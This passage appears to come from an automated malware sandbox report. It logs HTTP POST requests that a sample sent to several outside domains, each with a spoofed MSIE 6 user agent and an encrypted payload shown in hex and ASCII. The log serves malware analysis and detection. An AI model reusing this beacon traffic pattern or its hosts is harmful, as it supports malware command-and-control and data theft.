SL/iaDsYM8+/WpLL0rBxeyReqAZBN0+nn+2qqNe3wz5vQ2RrWA1CDMD1V8hYiNvi5cVpzfWeFnnN01B/Ofd8iyoxWTBRRXHb8VAiEeQjW90XAr2udk3UOYEPVXNqVeTsw28dynHqRSS0Iym3CntkvyMd/jTnol5l8w+6RA1K9IStuw3xVWgVRgZKPiCw4e6siWZ8+D6MPQvaD3zZ/BfzMcKErm/AJ5KwFhfJ4DAoNW8uyTgGrezbiSYs5hMFa8M8y2s+/P4lwzHgKPQKYf2Mcj2oQVQv/HZGQzNxFVN7zu+NVwU4D1ERFubpqEOlh+5lsVlF35GN8GKRgunHfc0swl1a9PpfREDCn6dUWHxG0q+3VOx35Lf4TvrPB8KmOj13STutBAUS1kF+N8IS+I0A4GGzs9yYXOUKelJHjGfn6edKs9Zhm7dqBol0ssoV94ZMcNY7qFMnd3x7/Ipzv6//Z6zw0rlSx92hYRavwm+f2DSJ/0/APs72HY+SE90dZN4YLw48m7eSWE3//KWyD8m3+QDRh7pVhJ8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=23d2d650a50ea91f96d166b8feecfbbf|84.17.52.43|1690487542|1690487542|0|1|0; snkz=84.17.52.43Data Raw: 72 38 36 6a 33 42 59 36 4a 73 38 41 64 30 35 55 38 61 71 71 71 4c 6c 72 50 48 4f 32 79 5a 64 37 71 72 64 77 75 4f 61 71 73 6a 6e 47 63 48 2b 74 6e 4e 49 53 4e 65 62 78 54 36 76 43 43 76 41 2b 37 76 41 78 35 79 4b 42 78 77 37 4f 66 4c 39 6c 73 68 6b 6c 2f 4f 4f 4e 69 53 43 46 74 75 61 4b 49 46 66 2b 33 52 65 72 50 32 48 32 55 70 2b 46 61 61 73 71 51 63 42 62 57 68 59 73 55 51 66 35 71 4c 5a 50 47 46 4f 52 4e 67 5a 6b 74 4c 38 43 58 31 5a 74 79 4d 74 4c 52 43 33 45 6c 4e 77 61 47 34 33 33 4f 4f 56 42 55 48 62 69 70 45 6d 70 7a 50 63 70 4a 73 33 38 6d 54 52 2b 4d 51 4c 61 6b 4e 35 50 52 79 78 45 4d 70 38 59 78 36 55 6b 71 55 51 33 37 54 44 78 4f 67 30 66 49 51 77 4a 46 45 76 79 66 5a 43 52 42 7a 57 68 50 4a 6f 41 4c 33 4d 61 41 32 4e 38 6f 36 2f 48 62 46 68 35 50 37 33 43 72 4b 57 74 62 4c 49 58 78 50 69 65 74 70 67 6a 4c 65 51 49 70 43 66 6c 36 54 57 48 59 73 51 63 68 78 32 69 35 35 34 6d 74 6d 47 33 32 32 6e 34 56 48 30 6f 41 42 55 4a 72 57 42 76 54 35 7a 6b 43 4f 48 56 34 70 6d 63 74 64 66 41 52 4f 51 37 67 33 49 76 57 7a 4d 71 34 4a 65 4b 68 44 46 44 49 38 58 65 66 38 5a 44 61 78 6c 57 42 47 5a 35 72 35 4f 53 47 58 36 57 35 42 6a 54 61 4f 6a 45 58 42 56 31 32 59 38 51 53 66 4d 62 35 69 64 72 32 39 65 31 70 41 74 5a 61 65 79 32 79 39 6f 6b 35 66 4f 49 57 59 53 38 48 47 69 73 6a 4a 54 59 38 46 48 47 66 76 35 51 42 64 58 58 68 33 36 4a 2b 64 41 58 45 34 65 74 69 57 45 58 79 58 38 44 43 59 4f 56 56 7a 6b 41 35 68 4e 74 32 71 31 46 61 7a 30 58 61 42 30 63 48 6d 42 73 6d 6f 49 78 42 34 6b 2f 4a 55 4d 32 6c 71 69 74 30 78 42 47 67 77 6c 62 51 62 69 78 2b 73 51 3d Data Ascii: r86j3BY6Js8Ad05U8aqqqLlrPHO2yZd7qrdwuOaqsjnGcH+tnNISNebxT6vCCvA+7vAx5yKBxw7OfL9lshkl/OONiSCFtuaKIFf+3RerP2H2Up+FaasqQcBbWhYsUQf5qLZPGFORNgZktL8CX1ZtyMtLRC3ElNwaG433OOVBUHbipEmpzPcpJs38mTR+MQLakN5PRyxEMp8Yx6UkqUQ37TDxOg0fIQwJFEvyfZCRBzWhPJoAL3MaA2N8o6/HbFh5P73CrKWtbLIXxPietpgjLeQIpCfl6TWHYsQchx2i554mtmG322n4VH0oABUJrWBvT5zkCOHV4pmctdfAROQ7g3IvWzMq4JeKhDFDI8Xef8ZDaxlWBGZ5r5OSGX6W5BjTaOjEXBV12Y8QSfMb5idr29e1pAtZaey2y9ok5fOIWYS8HGisjJTY8FHGfv5QBdXXh36J+dAXE4etiWEXyX8DCYOVVzkA5hNt2q1Faz0XaB0cHmBsmoIxB4k/JUM2lqit0xBGgwlbQbix+sQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 53 4c 2f 69 61 44 73 59 4d 38 2b 2f 57 70 4c 4c 30 72 42 78 65 79 52 65 71 41 5a 42 4e 30 2b 6e 6e 2b 32 71 71 4e 65 33 77 7a 35 76 51 32 52 72 57 41 31 43 44 4d 44 31 56 38 68 59 69 4e 76 69 35 63 56 70 7a 66 57 65 46 6e 6e 4e 30 31 42 2f 4f 66 64 38 69 79 6f 78 57 54 42 52 52 58 48 62 38 56 41 69 45 65 51 6a 57 39 30 58 41 72 32 75 64 6b 33 55 4f 59 45 50 56 58 4e 71 56 65 54 73 77 32 38 64 79 6e 48 71 52 53 53 30 49 79 6d 33 43 6e 74 6b 76 79 4d 64 2f 6a 54 6e 6f 6c 35 6c 38 77 2b 36 52 41 31 4b 39 49 53 74 75 77 33 78 56 57 67 56 52 67 5a 4b 50 69 43 77 34 65 36 73 69 57 5a 38 2b 44 36 4d 50 51 76 61 44 33 7a 5a 2f 42 66 7a 4d 63 4b 45 72 6d 2f 41 4a 35 4b 77 46 68 66 4a 34 44 41 6f 4e 57 38 75 79 54 67 47 72 65 7a 62 69 53 59 73 35 68 4d 46 61 38 4d 38 79 32 73 2b 2f 50 34 6c 77 7a 48 67 4b 50 51 4b 59 66 32 4d 63 6a 32 6f 51 56 51 76 2f 48 5a 47 51 7a 4e 78 46 56 4e 37 7a 75 2b 4e 56 77 55 34 44 31 45 52 46 75 62 70 71 45 4f 6c 68 2b 35 6c 73 56 6c 46 33 35 47 4e 38 47 4b 52 67 75 6e 48 66 63 30 73 77 6c 31 61 39 50 70 66 52 45 44 43 6e 36 64 55 57 48 78 47 30 71 2b 33 56 4f 78 33 35 4c 66 34 54 76 72 50 42 38 4b 6d 4f 6a 31 33 53 54 75 74 42 41 55 53 31 6b 46 2b 4e 38 49 53 2b 49 30 41 34 47 47 7a 73 39 79 59 58 4f 55 4b 65 6c 4a 48 6a 47 66 6e 36 65 64 4b 73 39 5a 68 6d 37 64 71 42 6f 6c 30 73 73 6f 56 39 34 5a 4d 63 4e 59 37 71 46 4d 6e 64 33 78 37 2f 49 70 7a 76 36 2f 2f 5a 36 7a 77 30 72 6c 53 78 39 32 68 59 52 61 76 77 6d 2b 66 32 44 53 4a 2f 30 2f 41 50 73 37 32 48 59 2b 53 45 39 30 64 5a 4e 34 59 4c 77 34 38 6d 37 65 53 57 45 33 2f 2f 4b 57 79 44 38 6d 33 2b 51 44 52 68 37 70 56 68 4a 38 3d Data Ascii: SL/iaDsYM8+/WpLL0rBxeyReqAZBN0+nn+2qqNe3wz5vQ2RrWA1CDMD1V8hYiNvi5cVpzfWeFnnN01B/Ofd8iyoxWTBRRXHb8VAiEeQjW90XAr2udk3UOYEPVXNqVeTsw28dynHqRSS0Iym3CntkvyMd/jTnol5l8w+6RA1K9IStuw3xVWgVRgZKPiCw4e6siWZ8+D6MPQvaD3zZ/BfzMcKErm/AJ5KwFhfJ4DAoNW8uyTgGrezbiSYs5hMFa8M8y2s+/P4lwzHgKPQKYf2Mcj2oQVQv/HZGQzNxFVN7zu+NVwU4D1ERFubpqEOlh+5lsVlF35GN8GKRgunHfc0swl1a9PpfREDCn6dUWHxG0q+3VOx35Lf4TvrPB8KmOj13STutBAUS1kF+N8IS+I0A4GGzs9yYXOUKelJHjGfn6edKs9Zhm7dqBol0ssoV94ZMcNY7qFMnd3x7/Ipzv6//Z6zw0rlSx92hYRavwm+f2DSJ/0/APs72HY+SE90dZN4YLw48m7eSWE3//KWyD8m3+QDRh7pVhJ8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4e 38 58 61 4c 47 56 31 4f 63 39 5a 64 51 39 6f 44 43 66 39 48 64 37 32 68 6e 75 7a 56 4b 45 78 61 56 41 76 37 63 6e 39 36 69 39 47 43 66 4f 32 71 36 33 44 71 38 66 35 2b 52 46 77 33 4c 37 4f 4c 68 35 4d 36 2b 50 4f 2f 6f 37 64 61 73 50 6b 67 43 2f 31 39 50 51 52 72 48 48 31 39 64 45 35 4f 30 43 6f 72 73 79 77 64 48 34 2b 4e 4d 57 72 37 72 2b 30 70 75 4d 74 4a 55 4d 63 76 75 64 64 79 7a 30 67 6c 58 5a 56 55 34 55 51 59 48 4e 59 72 30 62 61 79 64 32 39 46 34 6c 33 42 49 44 74 52 75 70 63 75 6e 75 46 2b 52 34 31 69 6f 4f 42 70 52 34 30 2b 37 4a 68 7a 32 53 38 4e 4c 53 6d 71 2b 52 54 7a 37 61 53 65 74 6a 33 34 39 2f 59 44 56 70 51 7a 68 54 4e 35 4c 6a 57 36 65 57 63 44 57 35 36 49 6e 78 4e 53 2f 58 64 59 35 67 6f 59 4e 4f 73 62 78 48 58 4d 4e 57 38 4b 30 6e 38 4d 61 4a 48 71 61 35 79 42 64 44 77 49 71 52 46 41 6f 64 2f 76 73 65 4a 79 37 77 4f 33 47 5a 49 54 5a 62 31 45 43 73 79 34 2b 71 46 66 37 34 65 6a 64 59 2b 57 48 6e 74 46 66 43 57 69 53 73 6e 75 47 5a 73 37 6c 68 6f 31 44 68 68 49 54 42 46 2f 30 4f 4a 54 41 43 67 6e 4a 7a 52 32 79 44 4d 41 56 35 43 56 50 65 54 2f 36 57 74 38 56 71 54 53 48 57 66 2f 44 62 61 68 78 58 46 2f 6f 70 64 61 73 35 45 34 4d 2b 6d 44 6a 74 6a 65 49 58 65 47 41 6f 53 44 4c 56 4a 59 51 46 4c 6a 6c 59 76 73 53 78 76 66 37 4e 30 58 36 34 30 6f 2b 33 4d 6f 69 58 73 45 46 6c 6f 49 65 4a 35 6b 43 57 42 57 73 39 39 6c 56 48 4a 4a 6a 51 42 39 34 37 4d 4f 48 4c 77 30 71 4b 65 6a 56 69 53 77 33 47 56 74 38 52 4c 51 4e 6d 37 67 43 31 6a 53 6f 35 74 52 4e 6a 76 65 51 4a 38 69 4e 31 54 51 6d 53 69 4e 6c 52 7a 55 4f 75 38 53 53 42 4e 76 6f 61 35 7a 46 73 65 7a 41 73 74 52 34 39 51 52 61 59 30 64 53 44 38 79 65 42 5a 35 42 4d 36 75 78 77 3d Data Ascii: N8XaLGV1Oc9ZdQ9oDCf9Hd72hnuzVKExaVAv7cn96i9GCfO2q63Dq8f5+RFw3L7OLh5M6+PO/o7dasPkgC/19PQRrHH19dE5O0CorsywdH4+NMWr7r+0puMtJUMcvuddyz0glXZVU4UQYHNYr0bayd29F4l3BIDtRupcunuF+R41ioOBpR40+7Jhz2S8NLSmq+RTz7aSetj349/YDVpQzhTN5LjW6eWcDW56InxNS/XdY5goYNOsbxHXMNW8K0n8MaJHqa5yBdDwIqRFAod/vseJy7wO3GZITZb1ECsy4+qFf74ejdY+WHntFfCWiSsnuGZs7lho1DhhITBF/0OJTACgnJzR2yDMAV5CVPeT/6Wt8VqTSHWf/DbahxXF/opdas5E4M+mDjtjeIXeGAoSDLVJYQFLjlYvsSxvf7N0X640o+3MoiXsEFloIeJ5kCWBWs99lVHJJjQB947MOHLw0qKejViSw3GVt8RLQNm7gC1jSo5tRNjveQJ8iN1TQmSiNlRzUOu8SSBNvoa5zFsezAstR49QRaY0dSD8yeBZ5BM6uxw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 7a 4e 47 35 33 4d 73 36 4a 73 2b 63 57 32 68 34 49 74 47 66 75 6a 54 76 46 64 34 52 64 54 78 71 4c 32 6d 67 61 30 2f 4b 77 63 6f 41 56 6a 73 54 58 38 4a 68 39 36 36 31 72 67 44 33 34 67 77 53 41 34 45 54 70 50 71 72 43 4e 73 6f 50 7a 61 57 68 77 7a 46 4f 69 75 61 71 54 54 6e 36 39 45 4a 76 30 2f 43 75 4e 58 43 36 6a 41 76 79 68 70 79 43 55 62 59 4d 63 4e 65 37 62 55 37 2f 77 34 78 50 6a 78 43 62 55 66 45 51 73 4b 6a 36 58 72 6b 6c 34 77 6a 53 64 43 38 4d 66 74 45 4f 7a 69 53 45 36 49 61 36 58 72 77 71 51 6e 55 37 7a 50 51 6f 4c 62 6b 42 7a 46 54 6f 47 67 48 38 46 73 2f 32 7a 6f 54 6d 37 34 59 45 68 4c 4c 5a 36 31 79 36 50 33 63 47 43 2b 7a 6f 33 6d 65 58 30 36 68 4d 68 63 4c 50 6c 51 44 52 6a 44 6b 77 48 4f 71 34 38 55 64 74 4c 65 55 76 6e 53 43 38 75 79 74 50 41 4b 37 34 30 56 67 4e 74 30 68 43 4e 4f 43 4e 68 71 75 73 41 63 53 30 66 6c 32 47 4a 76 70 75 31 36 77 69 72 6d 33 71 43 74 56 4b 72 50 47 6e 68 6f 4b 4d 58 31 2f 6c 6c 67 52 4c 7a 57 77 70 63 75 68 74 69 64 6b 33 66 42 2f 79 6a 6d 4c 58 43 2b 54 57 59 58 38 61 55 4d 79 72 44 66 46 32 4d 30 6b 4c 47 57 44 38 7a 42 44 4c 39 61 49 71 50 56 57 54 4b 42 4d 49 61 78 77 63 31 62 39 2b 43 46 74 42 33 30 2f 4d 73 70 63 31 66 64 57 69 56 38 6a 4e 42 36 47 41 30 7a 2f 39 39 48 31 64 61 67 4f 79 71 42 42 37 4e 42 61 39 76 35 4b 51 34 65 2b 77 52 30 49 38 31 70 50 4e 5a 32 65 69 75 44 49 7a 75 44 2b 4f 2b 2f 4e 6b 66 58 6d 61 6d 2b 59 6d 4d 4a 74 64 67 6f 6c 32 36 47 6d 37 61 48 72 69 78 58 52 34 55 35 43 37 76 79 4a 67 50 74 78 44 50 2f 4c 72 37 53 37 56 4e 75 74 50 44 43 56 48 64 79 65 51 38 52 48 55 4c 69 78 4d 2f 34 6d 52 67 49 76 57 68 41 75 6c 6f 48 30 4e 70 30 69 4e 6e 33 58 52 30 56 50 48 74 58 59 68 57 6a 79 Data Ascii: zNG53Ms6Js+cW2h4ItGfujTvFd4RdTxqL2mga0/KwcoAVjsTX8Jh9661rgD34gwSA4ETpPqrCNsoPzaWhwzFOiuaqTTn69EJv0/CuNXC6jAvyhpyCUbYMcNe7bU7/w4xPjxCbUfEQsKj6Xrkl4wjSdC8MftEOziSE6Ia6XrwqQnU7zPQoLbkBzFToGgH8Fs/2zoTm74YEhLLZ61y6P3cGC+zo3meX06hMhcLPlQDRjDkwHOq48UdtLeUvnSC8uytPAK740VgNt0hCNOCNhqusAcS0fl2GJvpu16wirm3qCtVKrPGnhoKMX1/llgRLzWwpcuhtidk3fB/yjmLXC+TWYX8aUMyrDfF2M0kLGWD8zBDL9aIqPVWTKBMIaxwc1b9+CFtB30/Mspc1fdWiV8jNB6GA0z/99H1dagOyqBB7NBa9v5KQ4e+wR0I81pPNZ2eiuDIzuD+O+/NkfXmam+YmMJtdgol26Gm7aHrixXR4U5C7vyJgPtxDP/Lr7S7VNutPDCVHdyeQ8RHULixM/4mRgIvWhAuloH0Np0iNn3XR0VPHtXYhWjy
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 67 48 43 46 5a 79 42 64 4f 38 2f 69 62 45 49 32 63 32 32 74 67 56 4d 68 2b 4b 6d 49 41 68 30 76 56 46 62 41 77 44 70 76 59 4c 71 6e 6f 76 66 69 64 75 39 59 52 42 4d 59 4b 5a 46 4b 4d 70 4e 6b 5a 4f 61 71 53 71 44 35 36 4f 78 72 62 35 31 53 35 63 63 6b 65 55 32 79 44 6e 72 45 47 6c 65 79 4c 4c 53 55 36 62 4b 31 42 65 35 65 75 30 44 37 68 79 45 6f 53 4b 4b 45 6b 65 6b 65 4e 30 52 4f 64 78 68 5a 65 54 52 53 73 50 63 30 4d 59 6d 51 4c 44 58 63 34 48 73 46 39 4b 63 6f 46 47 75 6d 52 59 73 77 58 73 6a 68 6f 61 4c 39 75 4e 47 6e 6d 45 39 4c 51 4f 39 59 55 6e 58 55 75 35 39 79 2f 58 50 7a 70 6d 75 4f 34 71 56 5a 74 66 73 35 6d 32 35 39 42 44 77 79 30 34 77 54 48 69 34 43 36 68 71 66 6f 31 54 39 76 73 6d 5a 72 6c 68 4a 53 46 4e 68 4f 6f 31 41 58 55 2b 2f 6b 54 77 31 7a 76 70 55 66 61 35 58 31 4a 5a 75 77 37 42 59 7a 79 50 5a 65 69 6f 65 36 46 6e 55 61 37 66 35 64 62 67 62 67 70 53 61 66 55 58 73 66 44 73 45 50 37 75 44 45 43 64 46 7a 48 38 38 36 6f 45 2f 39 4b 4f 74 46 48 76 57 5a 63 57 45 75 45 4f 54 6a 39 74 56 4b 32 44 71 4d 45 44 77 31 52 71 4f 5a 63 65 78 36 33 32 44 6d 41 50 43 51 4e 74 33 4a 71 7a 36 57 57 2f 4b 44 39 30 55 6d 6b 57 71 59 49 71 51 6b 59 74 39 44 6b 49 62 39 56 71 45 34 4e 4d 37 7a 72 66 38 5a 58 4b 41 4e 41 70 79 6a 42 34 51 66 5a 77 38 47 70 67 4b 78 6a 6f 2b 69 75 48 48 33 5a 4e 54 7a 56 62 7a 2f 55 7a 63 6f 4d 54 4e 7a 7a 4e 48 61 78 75 6d 57 6c 4a 68 38 7a 71 52 6d 2f 71 4c 6b 56 72 30 38 45 6d 38 74 41 54 35 34 47 63 7a 54 6b 6e 58 6e 62 2f 41 61 4d 68 31 50 33 4b 47 59 64 41 61 71 2b 2f 67 43 79 4e 4c 61 76 77 6a 2f 69 56 45 30 43 41 6d 52 6c 76 52 69 32 56 57 4b 51 3d 3d Data Ascii: gHCFZyBdO8/ibEI2c22tgVMh+KmIAh0vVFbAwDpvYLqnovfidu9YRBMYKZFKMpNkZOaqSqD56Oxrb51S5cckeU2yDnrEGleyLLSU6bK1Be5eu0D7hyEoSKKEkekeN0ROdxhZeTRSsPc0MYmQLDXc4HsF9KcoFGumRYswXsjhoaL9uNGnmE9LQO9YUnXUu59y/XPzpmuO4qVZtfs5m259BDwy04wTHi4C6hqfo1T9vsmZrlhJSFNhOo1AXU+/kTw1zvpUfa5X1JZuw7BYzyPZeioe6FnUa7f5dbgbgpSafUXsfDsEP7uDECdFzH886oE/9KOtFHvWZcWEuEOTj9tVK2DqMEDw1RqOZcex632DmAPCQNt3Jqz6WW/KD90UmkWqYIqQkYt9DkIb9VqE4NM7zrf8ZXKANApyjB4QfZw8GpgKxjo+iuHH3ZNTzVbz/UzcoMTNzzNHaxumWlJh8zqRm/qLkVr08Em8tAT54GczTknXnb/AaMh1P3KGYdAaq+/gCyNLavwj/iVE0CAmRlvRi2VWKQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4e 38 58 61 4c 47 56 31 4f 63 39 5a 64 51 39 6f 44 43 66 39 48 64 37 32 68 6e 75 7a 56 4b 45 78 61 56 41 76 37 63 6e 39 36 69 39 47 43 66 4f 32 71 36 33 44 71 38 66 35 2b 52 46 77 33 4c 37 4f 4c 68 35 4d 36 2b 50 4f 2f 6f 37 64 61 73 50 6b 67 43 2f 31 39 50 51 52 72 48 48 31 39 64 45 35 4f 30 43 6f 72 73 79 77 64 48 34 2b 4e 4d 57 72 37 72 2b 30 70 75 4d 74 4a 55 4d 63 76 75 64 64 79 7a 30 67 6c 58 5a 56 55 34 55 51 59 48 4e 59 72 30 62 61 79 64 32 39 46 34 6c 33 42 49 44 74 52 75 70 63 75 6e 75 46 2b 52 34 31 69 6f 4f 42 70 52 34 30 2b 37 4a 68 7a 32 53 38 4e 4c 53 6d 71 2b 52 54 7a 37 61 53 65 74 6a 33 34 39 2f 59 44 56 70 51 7a 68 54 4e 35 4c 6a 57 36 65 57 63 44 57 35 36 49 6e 78 4e 53 2f 58 64 59 35 67 6f 59 4e 4f 73 62 78 48 58 4d 4e 57 38 4b 30 6e 38 4d 61 4a 48 71 61 35 79 42 64 44 77 49 71 52 46 41 6f 64 2f 76 73 65 4a 79 37 77 4f 33 47 5a 49 54 5a 62 31 45 43 73 79 34 2b 71 46 66 37 34 65 6a 64 59 2b 57 48 6e 74 46 66 43 57 69 53 73 6e 75 47 5a 73 37 6c 68 6f 31 44 68 68 49 54 42 46 2f 30 4f 4a 54 41 43 67 6e 4a 7a 52 32 79 44 4d 41 56 35 43 56 50 65 54 2f 36 57 74 38 56 71 54 53 48 57 66 2f 44 62 61 68 78 58 46 2f 6f 70 64 61 73 35 45 34 4d 2b 6d 44 6a 74 6a 65 49 58 65 47 41 6f 53 44 4c 56 4a 59 51 46 4c 6a 6c 59 76 73 53 78 76 66 37 4e 30 58 36 34 30 6f 2b 33 4d 6f 69 58 73 45 46 6c 6f 49 65 4a 35 6b 43 57 42 57 73 39 39 6c 56 48 4a 4a 6a 51 42 39 34 37 4d 4f 48 4c 77 30 71 4b 65 6a 56 69 53 77 33 47 56 74 38 52 4c 51 4e 6d 37 67 43 31 6a 53 6f 35 74 52 4e 6a 76 65 51 4a 38 69 4e 31 54 51 6d 53 69 4e 6c 52 7a 55 4f 75 38 53 53 42 4e 76 6f 61 35 7a 46 73 65 7a 41 73 74 52 34 39 51 52 61 59 30 64 53 44 38 79 65 42 5a 35 42 4d 36 75 78 77 3d Data Ascii: N8XaLGV1Oc9ZdQ9oDCf9Hd72hnuzVKExaVAv7cn96i9GCfO2q63Dq8f5+RFw3L7OLh5M6+PO/o7dasPkgC/19PQRrHH19dE5O0CorsywdH4+NMWr7r+0puMtJUMcvuddyz0glXZVU4UQYHNYr0bayd29F4l3BIDtRupcunuF+R41ioOBpR40+7Jhz2S8NLSmq+RTz7aSetj349/YDVpQzhTN5LjW6eWcDW56InxNS/XdY5goYNOsbxHXMNW8K0n8MaJHqa5yBdDwIqRFAod/vseJy7wO3GZITZb1ECsy4+qFf74ejdY+WHntFfCWiSsnuGZs7lho1DhhITBF/0OJTACgnJzR2yDMAV5CVPeT/6Wt8VqTSHWf/DbahxXF/opdas5E4M+mDjtjeIXeGAoSDLVJYQFLjlYvsSxvf7N0X640o+3MoiXsEFloIeJ5kCWBWs99lVHJJjQB947MOHLw0qKejViSw3GVt8RLQNm7gC1jSo5tRNjveQJ8iN1TQmSiNlRzUOu8SSBNvoa5zFsezAstR49QRaY0dSD8yeBZ5BM6uxw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=ietvmldvxeakytrdfhbatfsweopuymcoData Raw: 71 4e 71 61 74 71 4f 74 48 4d 39 52 63 72 71 44 4b 72 62 39 49 73 78 66 54 66 44 4a 44 4d 46 73 68 32 58 77 70 35 53 38 62 73 54 59 4b 45 57 56 4a 45 4f 36 72 42 6f 78 2b 53 77 56 42 78 6a 48 4d 67 37 6b 67 46 68 4c 6f 6c 72 68 2f 6f 59 4a 69 6b 76 4d 4f 51 59 4f 2f 45 35 4f 46 48 72 41 76 50 55 49 37 79 7a 61 73 70 43 67 31 47 62 53 4e 33 2f 73 51 6a 4c 76 30 79 48 65 57 48 66 36 70 62 6d 55 69 41 37 75 37 2f 4e 30 37 59 54 77 57 66 4a 47 34 62 57 4a 62 39 49 39 51 64 56 75 41 74 4b 75 77 31 36 33 42 45 49 7a 36 67 50 79 31 44 5a 77 4f 47 6f 6c 65 75 73 2b 52 6f 4c 4b 74 6e 50 34 6a 6c 58 72 33 72 43 69 56 57 73 54 36 31 72 41 54 43 6b 57 57 47 38 57 31 7a 43 4d 5a 69 4d 71 44 43 45 79 51 71 4e 65 62 48 67 44 47 47 75 4e 36 66 2b 45 30 42 4a 71 6b 79 46 6c 75 53 42 6b 61 6f 59 74 36 6c 56 70 37 6e 35 51 69 56 76 52 2b 73 44 56 6f 4d 67 5a 44 2f 63 6d 41 6e 49 54 30 79 38 61 4a 61 48 34 56 78 56 42 55 65 50 63 74 39 6f 65 43 63 4f 6e 2b 5a 63 6f 32 52 56 5a 66 4e 68 62 64 64 55 7a 74 4e 54 75 52 63 66 71 4f 76 43 74 7a 65 44 4c 67 35 31 39 78 61 75 4f 51 34 46 6e 57 68 54 50 59 37 52 48 64 6f 74 58 52 66 4b 43 2b 51 31 58 55 48 52 46 58 4b 45 61 44 38 64 5a 72 4d 57 51 4a 56 43 31 54 76 6b 7a 59 47 72 41 68 61 65 34 78 37 33 65 77 59 34 57 69 38 77 67 44 57 56 31 63 6a 59 50 4e 5a 68 54 46 51 2f 45 71 4a 62 49 32 37 37 52 2b 2f 34 50 6f 6a 63 6f 77 6b 65 62 31 33 2b 57 65 53 45 65 70 74 6b 44 34 54 77 34 64 71 72 48 6e 66 33 35 63 4c 6c 6e 7a 6b 34 58 2f 46 77 37 4e 4b 66 55 52 4d 33 36 72 48 61 6d 36 5a 45 48 4d 65 71 72 69 52 59 6d 63 39 48 63 65 6b 79 45 36 66 42 31 61 71 55 6e 67 44 31 5a 67 44 69 42 71 71 70 49 2f 63 2f 67 47 46 52 4c Data Ascii: qNqatqOtHM9RcrqDKrb9IsxfTfDJDMFsh2Xwp5S8bsTYKEWVJEO6rBox+SwVBxjHMg7kgFhLolrh/oYJikvMOQYO/E5OFHrAvPUI7yzaspCg1GbSN3/sQjLv0yHeWHf6pbmUiA7u7/N07YTwWfJG4bWJb9I9QdVuAtKuw163BEIz6gPy1DZwOGoleus+RoLKtnP4jlXr3rCiVWsT61rATCkWWG8W1zCMZiMqDCEyQqNebHgDGGuN6f+E0BJqkyFluSBkaoYt6lVp7n5QiVvR+sDVoMgZD/cmAnIT0y8aJaH4VxVBUePct9oeCcOn+Zco2RVZfNhbddUztNTuRcfqOvCtzeDLg519xauOQ4FnWhTPY7RHdotXRfKC+Q1XUHRFXKEaD8dZrMWQJVC1TvkzYGrAhae4x73ewY4Wi8wgDWV1cjYPNZhTFQ/EqJbI277R+/4Pojcowkeb13+WeSEeptkD4Tw4dqrHnf35cLlnzk4X/Fw7NKfURM36rHam6ZEHMeqriRYmc9HcekyE6fB1aqUngD1ZgDiBqqpI/c/gGFRL
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 54 65 5a 41 33 53 61 41 52 38 39 74 51 68 66 50 77 5a 6e 56 77 30 6c 6f 34 55 45 47 59 55 4c 47 75 70 59 52 66 33 4a 46 4d 32 6f 78 6c 32 38 65 55 45 32 35 44 6e 55 43 51 2b 63 4d 73 78 49 58 71 49 61 38 32 79 2f 4c 37 49 74 49 57 68 68 74 6a 43 48 41 58 75 44 38 4b 73 36 72 67 73 6f 6a 55 47 79 68 54 41 66 4f 4a 74 2f 61 32 2b 79 62 51 37 51 76 38 31 63 56 4a 2b 72 33 2b 2f 73 48 73 4b 47 77 2b 78 69 2f 50 56 5a 4b 4d 6f 75 64 2f 6c 70 45 58 38 39 7a 79 63 42 72 6e 79 59 79 66 77 33 43 49 69 39 58 71 7a 64 42 66 61 6a 34 63 61 70 72 31 72 56 4b 59 5a 79 43 6c 33 74 52 36 52 69 6f 5a 72 61 36 75 62 6e 2f 57 51 67 35 31 59 44 79 4c 48 56 5a 41 37 75 6d 59 59 49 2f 68 57 56 34 58 66 35 55 54 49 41 36 71 57 4b 30 68 6c 77 43 74 4f 64 4f 49 7a 52 67 79 43 35 47 7a 55 52 7a 45 2b 58 46 51 74 41 79 51 52 65 75 6d 49 73 70 6b 70 67 46 41 59 6e 7a 62 65 47 33 2f 4e 58 47 54 33 69 57 61 36 42 42 36 4e 53 35 75 4b 74 6a 2f 4e 37 44 75 50 61 34 72 54 35 73 57 42 4a 2b 64 35 4f 54 4c 36 50 4c 53 30 2b 38 77 75 59 4f 78 6d 6a 6e 6b 52 6d 6f 4c 53 70 35 47 47 33 54 32 70 37 53 73 62 43 6e 2b 42 37 4a 73 39 4e 37 37 2b 6d 55 65 4a 33 4d 63 72 4b 32 34 6c 64 59 43 39 48 6a 74 6b 31 4c 4e 62 75 46 67 49 33 72 